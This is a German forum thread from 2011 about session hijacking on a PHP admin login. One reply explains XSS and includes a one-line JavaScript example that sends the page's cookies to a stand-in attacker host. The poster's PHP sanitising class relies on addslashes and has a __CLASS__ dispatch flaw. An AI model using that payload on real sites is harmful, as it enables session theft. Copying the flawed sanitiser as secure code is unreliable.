Sichere SSID

Dear visitor, welcome to Coder Forum. If this is your first visit here, please read the Help. It explains in detail how this page works. To use all features of this page, you should consider registering. Please use the registration form, to register here or read more information about the registration process. If you are already registered, please login here.

ViktorM

Intermediate

Posts: 45

Wednesday, March 2nd 2011, 4:21pm

Sichere SSID

Hallo,

ich möchte einen Admin Login erstellen und versuche ihn so einzurichten, dass der Login solange wie möglich besteht.

Dazu generiere ich einen md5 Hash einer zufälligen aneinanderreihung von Zahlen (5mal rand(100000000, 999999999) . date("H:i:s") . ...)

Die SSID wird dan in den cookies des Browsers vom Benutzer gespeichert und sodurch kann der Benutzer sich jeder Zeit mit dem gleichem Browser immer anmelden. (bis er die cookies reinigt oder was auch immer), zur sicherheit dazu habe habe ich noch eingerichtet, dass jedes Mal, wen der Benutzer die Seite irgentwie neu aufruft(z.B. anderer Menüpunkt), wird die SSID neu generiert und upgedatet.

Eigentlich ist das schon einiger Masen sicher, aber man kann ja immer noch mit trojaner programmen die SSID auslesen und deshalb müchte ich zusetzlich zu der SSID spezielle Merkmale speichern, welche einen SSID Dieb daran hindern sollen sich einzuloggen. Eine IP Adresse ist da zwar hilfreich jedoch nutzlos wen der Dieb sich im gleichem Netzwerk aufhelt.

Kennt jemand eine sichere Möglichkeit eine SSID möglichst lange aufrecht zu erhalten und dennoch geschützt gegen SSID Diebe zu sein?

philippgerard

Professional

Posts: 292

Wednesday, March 2nd 2011, 6:16pm

Mir scheint, Du sorgst Dich um Session Highjacking. Ich empfehle dazu als Literatur immer gerne folgenden Blogeintrag: http://shiflett.org/articles/session-hijacking

js.spaceher0

Trainee

Posts: 41

Wednesday, March 2nd 2011, 10:51pm

XSS - Session Hijacking

du solltest dich so gut es geht gegen XSS - Angriffe schützen, da man mit einem javascript deine cookies ausgelesen werden können. Die klassische XSS-Attacke, ist die Session-Highjacking-Attacke. dabei wird die Session-ID des Benutzers, welche in der Regel in einem cookie abgelegt ist, an den webserver des angreifers übertragen. solange die SID gültig ist, kann dieser dann automatisiert im namen des opfers auf dem web-server hacken. sowas lässt sich schon mit einem ganz kurzen javascript arledigen.

	JavaScript Code
1	window.open("http://angreifer.com/?cookie="+document.cookies)

Das ist ntürlich nur ein Bsp.

dieser Code übergibt nun alle cookies der aktuellen seite an die website "http://angreifer.com". Anwender können nur wenig gegen XSS-angriffe tun, er könnte die bedienung wichtiger applikationen wie onlinebanking oder das einkaufen z.B. bei ebay von spziellen accounts aus tätigen und einen browser mit deaktiviertem javascript verwenden. Dies ist aber vorallem sehr mühsam und es gibt ja noch weiter XSS-Angriffe, die davon ausgeschlossen sind, z.B. Session-fixing. (funktionieren auch ohne javascript)
Der Entwikler der Applikation, also du

hast da schon mehr Möglichkeiten. Jede Ausgabe von Daten, die von einer externen Quelle stammen sei es eine Benutzereingabe oder seien es auf andere Art ins System gelangene Daten, ist bei der Ausgabe in HTML besonders zu behandeln. Alle Sonderzeichen müsen durch ihre html kodierung ersetzt werden, damit sie nicht mehr aktiv als Script Code oder als html-code interpretiert werden. Da man ja nicht immer weiss, was ein nun ein sinderzeichen ist, empfiehlt es sich das Kodieren von allen Zeichen ausser der Buchstaben und Ziffern. Die meisten webapplikationen frameworks bieten eine Möglichket, um Ausgaben entsprechend zu Kodieren. In PHP sind das zum Beispiel die Funktionen 'htmlentities()' und 'htmlspecialchars()'. Eine Ausgabe sollte in PHP also immer in dieser Form sein:

	PHP Quellcode
1 2 3	$data = fetch_data_from_database($query); $quoted_data = htmlentities($data); echo $quoted_data;

Problematisch wird es nur, wenn wie in einem Forum

der benutzer in der Lage sein soll, bestimmte HTML konstrukte wie fettdruck oder farbveränderungen zu benutzen. Auch hier muss jede Eingabe und Ausgabe die DAten entsprechend der gewünschten Funktionalität anpassen.
Der Admin des Servers kann auch nur die Eingabe zur Applikation kontrollieren und versuchen, das Einschleusen von javascript zu verhindern. Leider ist das nicht so einfach, es reciht nicht, einfach nach '<script' zu filtern, da das Einbetten von javascript code auf vielen arten erfolgen kann. Am besten ist das filtern von '<' und '%' in allen Eingabefeldern. So ist ein XSS-Angriff erschwert worden. Wenn man die Möglichkeit zur Erstellung einer whitelist hat, sollte man dies machen. Es können natürlich auch speziel produkte gekauft werden die dies verhindern können bzw. dabei helfen xss angriffe zu vermeiden.

Sry wegen der ganzen Fehler, es ist schon spät

Ich hoffe ich konnte ein wenig helfen.

ViktorM

Intermediate

Posts: 45

Thursday, March 3rd 2011, 7:48pm

A danke

, habe mir das durchgelesen und weis jetzt auch besser bescheid wie sie das mit der SSID klauen machen. Eigentlich kann man in meine Seite weder SQL noch HTML Code einschleusen, (zumindest denke ich das, habe dafür diese Klasse geschrieben).

Aber man kann die SSID immer noch dadurch klauen, indem man z.B. mit einem Programm die SSID rausfiltert. Oder noch tiefer in die Netzwerkkommunikation reingreift.

PS: Ich habe diese Klasse(n) für mich geschrieben um alle Parameter, auf die ich zugreife gegen HTML Code und SQL Code zu schützen. Ist Sie sicher genug? Welche Lücken sind da noch?

PHP Quellcode

<?php
class _REQUEST{
		/*
	* Prüft einen Parameter von Typ Zahl auf seine Gültigkeit und gibt diesen zurück.
	*	Bei ungültigem Parameter gibt false zurück.
	* @pnm Der Name des Parameters.
	* @min Minimale Größe der Zahl. (default false)
	* @max Maximale Größe der Zahl. (default false)
	* @force Bestimmt, ob der Parameter erzwungen werden soll. (default false)
	* 	Beim erzwingen des Parameters wird die nechst gültige Zahl auch aus einem String ausgelesen.
	*/
	static function Digit($pnm, $min = false, $max = false, $force = true){
		$x = self::get_needed_parameter($pnm);
		$reg = "(-?[\d]+)";
		if($force){
			$reg = "/" . $reg . "/is";
		}else{
			$reg = "/^" . $reg . "$/is";
		}
 
		for($i = 0;$i < preg_match_all($reg, $x, $list);$i++){
			if(self::check_value_is_in_interval($min, $max, $list[0][$i])){
				return $list[0][$i];
			}
		}
		return false;
	}
	/*
	* Gibt einen Parameter von Typ Text zurück.
	* @pnm Der Name des Parameters.
	* @sql_mask Maskiert alle ' und \. (Verhindert SQL Injektionen)
	* @html_mask Maskiert einen HTML Code. (Verhindert JavaScript und ehnliches)
	* @nl2br Übersetzt neue Zeilen zu <br> für die richtige Darstellung in HTML.
	*/
	static function Text($pnm, $sql_mask = true, $html_mask = false, $nl2br = false){
		$text = self::get_needed_parameter($pnm);
 
		if($html_mask){
			self::mask_html($text);
		}
		if($nl2br){ $text = nl2br($text); }
		if($sql_mask){
			self::mask_sql($text);
		}
 
		return $text;
	}
 
	/*
	* Überprüft, ob der Inhalt des Parameters in die Maske passt.
	* @pnm Name des Parameters.
	* @regex Maske in Form eines regulären Ausdrucks.
	*/
	static function IsMatch($pnm, $regex){
		$strg = self::get_needed_parameter($pnm);
		if(preg_match($regex, $strg, $matches)){
			return true;
		}
		return false;
	}
	/*
	* Filtert den Parameter durch eine Maske.
	* @pnm Name des Parameters.
	* @regex Maske in Form eines regulären Ausdrucks.
	*/
	static function Match($pnm, $regex){
		$strg = self::get_needed_parameter($pnm);
		preg_match($regex, $strg, $matches);
		return $matches;
	}
	/*
	* Filtert den Parameter durch eine Maske mehrmals.
	* @pnm Name des Parameters.
	* @regex Maske in Form eines regulären Ausdrucks.
	* €Anzahl der gefundenen Übereinstimmungen.
	*/
	static function MatchAll($pnm, $regex, &$counter = 0){
		$strg = self::get_needed_parameter($pnm);
		$counter = preg_match_all($regex, $strg, $matches);
		return $matches;
	}
 
 
 
	static function mask_sql(&$string){
		$string = addslashes($string);
	}
 
	static function mask_html(&$string){
		$string = htmlentities($string);
	}
 
	/*
	* Ersetzt eine Zeichenkette durch eine andere.
	* @search Die zu ersetzende Zeichenkette.
	* @replace Die einzusetzende Zeichenkette.
	* €subject Die zu durchsuchende Zeichenkette.
	*/
	static function replace($search, $replace, &$subject){
		$subject = str_replace($search, $replace, $subject);
	}
 
	/*
	* Prüft ob eine Zahl im Interval zwischen einschlieslich zwei Zahlen liegt.
	* @min Die kleinste zulässige Zahl im Interval. (default false)
	* @max Die größte zulässige Zahl im Interval. (default false)
	* @val Die zu überprüfende Zahl.
	*/
	static function check_value_is_in_interval($min, $max, $val){
		if(($min == false || $val >= $min) && ($max == false || $val <= $max)){
			return true;
		}
			return false;
	}
	/*
	* Gibt den Inhalt eines Header Parameters zurück.
	* @pname Der Name des Parameters, welcher zurück gegeben werden soll.
	*/
	static function get_needed_parameter($pname){
		if(__CLASS__ == "_GET"){
			return $_GET[$pname];
		}else if(__CLASS__ == "_POST"){
			return $_POST[$pname];
		}else if(__CLASS__ == "_SESSION"){
			return $_SESSION[$pname];
		}else if(__CLASS__ == "_SERVER"){
			return $_SERVER[$pname];
		}else if(__CLASS__ == "_FILES"){
			return $_FILES[$pname];
		}else if(__CLASS__ == "_COOKIE"){
			return $_COOKIE[$pname];
		}
			return $_REQUEST[$pname];
	}
}
//WARNUNG:Klassennamen sind verbunden mit get_needed_parameter!!!
class _GET extends _REQUEST{}
class _POST extends _REQUEST{}
class _SESSION extends _REQUEST{}
class _SERVER extends _REQUEST{}
class _FILES extends _REQUEST{}
class _COOKIE extends _REQUEST{}
 
?>
 
Verwendung:
<?php
$x = _POST::Digit('id');
?>